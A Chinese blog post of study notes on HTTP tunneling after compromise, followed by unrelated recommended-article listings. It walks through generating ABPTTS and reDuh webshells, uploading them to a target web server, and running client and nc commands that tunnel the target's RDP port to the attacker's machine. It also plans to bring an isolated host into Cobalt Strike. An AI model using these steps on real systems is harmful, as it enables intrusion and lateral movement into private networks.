8月19日笔记(http隧道搭建(续))

已于 2024-10-09 21:45:08 修改
阅读量354 收藏 9
点赞数 4
分类专栏: web学习 文章标签: 笔记 网络
于 2024-08-19 23:49:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74736832/article/details/141337571
版权

http隧道搭建(续)

ABPTTS安装使用

一款基于 SSL 加密的 HTTP 端口转发工具,全程通信数据加密,比 reGerog 都要稳定。使用 python2 编写,但是该工具只支持 aspx 和 jsp 脚本的网站。
下载地址:https://github.com/nccgroup/ABPTTS
下载依赖:pip2 install pycrypto httplib2
使用教程

python2 abpttsfactory.py -o webshell

执行上面的命令会在ABPTTS目录下生成webshell目录
QQ_1724035605447.png
将对应脚本语言的文件上传到目标 web 目录下,访问如下。
QQ_1724072851438.png
这样就上传成功了。接下来输入以下指令(linux/mac):

python2 abpttsclient.py -c webshell/config.txt -u http://192.168.5.138/abptts.jsp -f 127.0.0.1:3389/192.168.5.138:3389 --unsafetls

进行端口转发。会将目标机器的 3389 端口映射到本地的 3389 端口。
如果是windows版本的:

python2 abpttsclient.py -c webshell\config.txt -u http://10.211.55.3:8080/shiro/abptts.jsp -f 127.0.0.1:3389/10.211.55.3:3389 --unsafetls

QQ_1724073077945.png
输入以下命令查看我们攻击机的端口有没有开放(kali):

nc -zv localhost 3389

QQ_1724073147609.png
已经成功开放了。
现在只要用ssh和RDP到本地的3389端口就可以连接到目标主机的3389端口了。

reDuh

reDuh 是一款将 TCP 流量封装在 HTTP 流量中的工具。
下载地址:https://github.com/sensepost/reDuh
下载下来后打开servers的文件夹。
QQ_1724077416068.png
将对应脚本语言的文件上传到目标 web 目录下,访问如下。
QQ_1724077530303.png
进入reDuh/reDuhClient/dist的目录下,然后在本地执行如下命令

java -jar reDuhClient.jar http://192.168.5.138/reDuh.jsp

QQ_1724077715878.png
根据返回的内容提示我们监听本地的1010端口。
重新开一个窗口,使用 nc 监听本地的 1010 端口,然后执行如下命令,将目标主机的 3389 端口映射到本地的 33389 端口。

nc -vv localhost 1010
[createTunnel]33389:127.0.0.1:3389

QQ_1724078187366.png
然后连接本地的 33389 端口即可连接到目标内网的 3389 了。

不出网上线CS

我们打下了一个目标机器 192.168.5.138,但是该机器不出网,我们现在想让其上线CS。我们的思路是这样的,通过配置代理,让本地虚拟机 192.168.5.128 可以访问到目标机器。然后让本地虚拟机上线 cs,走 bind_tcp 去连接目标机器。(环境问题,明天继续整)

点云从入门到精通技术详解100篇-基于 5G 通讯的轨道移动激光雷达测量
getusushu的博客
02-22 415
在这样的背景下,为了提高配准的精度和速度,轨道交通作为城市公共基础设施建设的重要组成部分,对优化城市空间布局,缓解城市。明确强调,要以最新技术与城轨交通深入融合作为核心,积极推动城轨信息化发展,加。动智慧型轨道交通建设,推动城市轨道交通智能化、高效化发展,以满足城市快速发展。推式的行进方式、线扫描的数据采集模式进行作业,装配有高昂的位姿定位模块,具有。描,点云拼接精度达毫米级,虽然工作时间相对连移动式扫描时间长,但是精度普遍。小二乘法,重复执行“确认关系点集,并得到最优刚体变换”的具体步骤,直到满足收。
【云原生进阶之容器】第六章容器网络6.4.3--Flannel网络模式
junbaozi的专栏
04-15 844
Flannel通过在每一个节点上启动一个叫做flanneld的进程,负责每一个节点上的子网划分,并将相关的配置信息(如各个节点的子网网段、外部IP等)保存到etcd中,而具体的网络包转发交给具体的backend实现。flanneld可以在启动时通过配置文件指定不同的backend进行网络通信,Flannel支持三种backend:UDP、VXLAN、host-gw。目前VXLAN是官方最推崇的一种backend实现方式;host-gw一般用于对网络性能要求比较高的场景,但需要基础网络架构的支持。
823笔记(NPS的使用)
m0_74736832的博客
08-24 506
场景:假设我已经获得了内网中一台主机的权限,并且知道该主机的登录用户名和密码。为了能够在公网环境中通过 VPS 连接到这台内网主机的 3389 端口,我决定使用 SSH 端口转发技术。假设场景:想将公网服务器 192.168.5.168的 8888 端口作为 socks5 代理,达到访问内网任意设备或者资源的效果。适用范围: 无需占用多余的端口、安全性要求较高可以防止其他人连接的 tcp 服务,例如 ssh。假设场景: 无需新增多的端口实现访问内网服务器 10.211.55.15 的 22 端口。
图解HTTP读书笔记
thezapple的博客
10-30 5632
图解HTTP前言第一章 Web及网络基础1.1 使用HTTP协议访问Web1.2 HTTP的诞生 前言 用到HTTP协议的各方面知识:网络爬虫程序、分析抓包数据、实现HTTP服务器、提供网站REST API、修改后端定制框架等方面。本书前半部分由HTTP的成长发展史娓娓道来,基于HTTP 1.1标准讲解通信过程,包括HTTP方法、协议格式、报文结构、首部字段、状态码等的具体含义,还分别讲解HTTP通信过程中代理、网关、隧道等的作用。接着介绍SPDY、WebSocket、WebDAV等HTTP的扩展功能。作者
笔记本安装双系统linux系统盘,关于笔记本安装双系统windows and linux
weixin_31617975的博客
04-28 462
ps1.安装完成后,补充下如何设在win7为默认启动系统,大家也都知道,在linux 运行当软件都是以配置文件来设置参数当,当然grub菜单也不例外,修改菜单可以进入grub.conf[root@vmbox ~]# vim /boot/grub/grub.conf# grub.conf generated by anaconda## Note that you do not have to rer...
HTTP协议
一名在校大三学习JAVA
04-14 950
要利用Cookie做到HTTP协议有状态(跨请求-响应有逻辑关系)对于服务器,需要有设置凭证的职责,在HTTP中的表现为HTTP响应中,添加Set-Cookie响应头,value是要设置的cookie信息对于客户端,有保存凭证的职责,在HTTP的具体表现为,客户端需要理解Set-Cookie这个响应头的职责,根据响应中的Set-Cookie的value,将Cookie的信息解析并保存对于客户端,在发送任意请求时,都有携带属于本网站的所有的Cookie的职责。
Linux 个人笔记
u014709660的专栏
07-14 1106
Linux 个人笔记 我的普通用户 su spm 创建普通用户useradd 用户名 创建新用户密码 passwd 用户名  wang 密码123456 第一次课(装系统) 1.查看内核版本命令 uname -r 2.关机不重新启动命令 shutdown -h now 3.关机后重新启动命名 shutdown -r或reboot或halt 4.注销用户 tty下 logout
Electron 开发入门
热门推荐
GitChat
01-09 2万+
课程亮点 剖析 Electron 从安装到发布的整个流程 如何使用 Git 管理 Electron 应用源代码 如何使用 C++ 开发 Electron 本地模块 知识点 + 示例 + 源代码 课程背景 Electron 允许使用 Web 技术(HTML 5、CSS 3、JavaScript)开发跨平台桌面应用,这对 Web 前端和 Node.js 开发者是一大福音,因为从此又多了一项技能。目...
高并发场景 LVS 安装及高可用实现(收藏)
m0_68850571的博客
04-21 1019
1.1负载均衡介绍 1.1.1负载均衡的妙用 负载均衡(Load Balance)集群提供了一种廉价、有效、透明的方法,来扩展网络设备和服务器的负载、带宽、增加吞吐量、加强网络数据处理能力、提高网络的灵活性和可用性。 单台计算机无法承受大规模的并发访问或数据流量了,此时需要搭建负载均衡集群把流量分摊到多台节点设备上分别处理,即减少用户等待响应的时间又提升了用户体验; 7*24小时的服务保证,任意一个或多个有限后端节点设备宕机,不能影响整个业务的运行。 1.1.2为什么要用lvs 工作在网络模型的7
frps 多个_使用frp工具实现内网的穿透以及配置多个ssh和web服务
weixin_39699670的博客
12-20 1450
frp简介frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 httphttps 应用协议提供了额外的能力,且尝试性支持了点对点穿透。环境准备ssh连接1. 需要一台可以直接访问外网的服务器,比如阿里云服务器(服务端)2. 需要做内网穿透的服务器,比如公司内部的局域网测试服务器(客户端)web访问3. 需要额外的已经备案的域名下载地址安装步骤客户端跟服务端都...
「GoCN酷Go推荐」后现代时代远程办公网络问题的golang开源解决方案 —— PairMesh...
Go中国
03-24 1422
PairMesh是什么?Pairmesh是一款先进的虚拟局域网(VPN)工具,用来搭建与访问安全,易用,高性能的点对点的软件定义虚拟局域网,为远程办公的网络连接问题提供了开箱即用的解决方案。拥抱开源,拥抱开放PairMesh是主要使用go语言开发实现的开源项目,您可以查看并获取PairMesh源代码:https://github.com/pairmesh/pairmesh...
批量归一化 BN(Batch Normalization) (减少重复学习 - 加速损失收敛) + 代码实现 ——笔记2.15《动手学深度学习》
科研汪小陈的博客
11-08 963
批量归一化固定小批量中的均值和方差,然后学习出适合的偏移和缩放; 可以加速收敛速度(比如以前学习率是0.01,现在用了批量归一化后,可以调到0.1) 不会出现之前:学习率太大的话,上面 (靠近损失的梯度) 会炸掉; 不会出现之前:学习率太小的话,下面 (靠近数据的模型参数) 会学不动; 每一个层的输出都通过均值方差放在一起了,上下层的分布都差不多是正态分布; 但一般不改变模型精度
RK3588开发笔记:CPU、GPU、DDR和NPU模式设置与查询
flypig has a dream!
11-05 270
以下是关于RK3588开发板在和NPU模式设置与查询的开发笔记,希望可以帮助开发者深入了解该芯片的硬件资源配置和调试方法。提示:以下是本篇文章正文内容,下面案例可供参考以上是对RK3588中CPU、GPU、DDR和NPU的模式设置与查询方式的总结。合理设置这些模块的工作频率和模式,可以显著优化RK3588在不同场景中的性能和功耗。
软件测试学习笔记丨Vue常用指令-条件渲染(v-if)
ceshiren_com的博客
11-05 629
v-show只是简单控制dom元素的display属性。v-if通过操纵dom元素来进行切换显示。
Greiner 经典力学(多体系统和哈密顿力学)第十二章 学习笔记(Rotation About a Point)
Ivan 的专栏
11-09 519
上一章是绕定轴转动,这章是绕定点转动。这一章明显上难度了。
协议栈攻击分类(CISP-PTE笔记
土豆片的博客
11-06 710
1.协议栈自身的脆弱性​ 1)缺乏数据源验证机制​ 2)缺乏完整性验证机制​ 3)缺乏机密性验证机制2.网络接口层攻击3.网络层攻击4.应用层攻击。
软考中级 软件设计师 上午考试内容笔记(个人向)Part.1
最新发布
ozawacai的博客
11-09 601
如标题所示
nvlink 训练笔记
jacke121的专栏
11-05 320
nvlink 训练笔记
JAVA基础:数组 (习题笔记
2301_81819439的博客
11-05 1322
编码题 ;简答题
Hyperledger Fabric 入门笔记(十六)Fabric V2.5 测试网络部署补充 - 手动从通道中移除组织
sbsy123456的博客
11-06 366
本节介绍如何从包含了组织Org1、Org2和Org3的Fabric测试网络中移除组织Org2。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pk客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值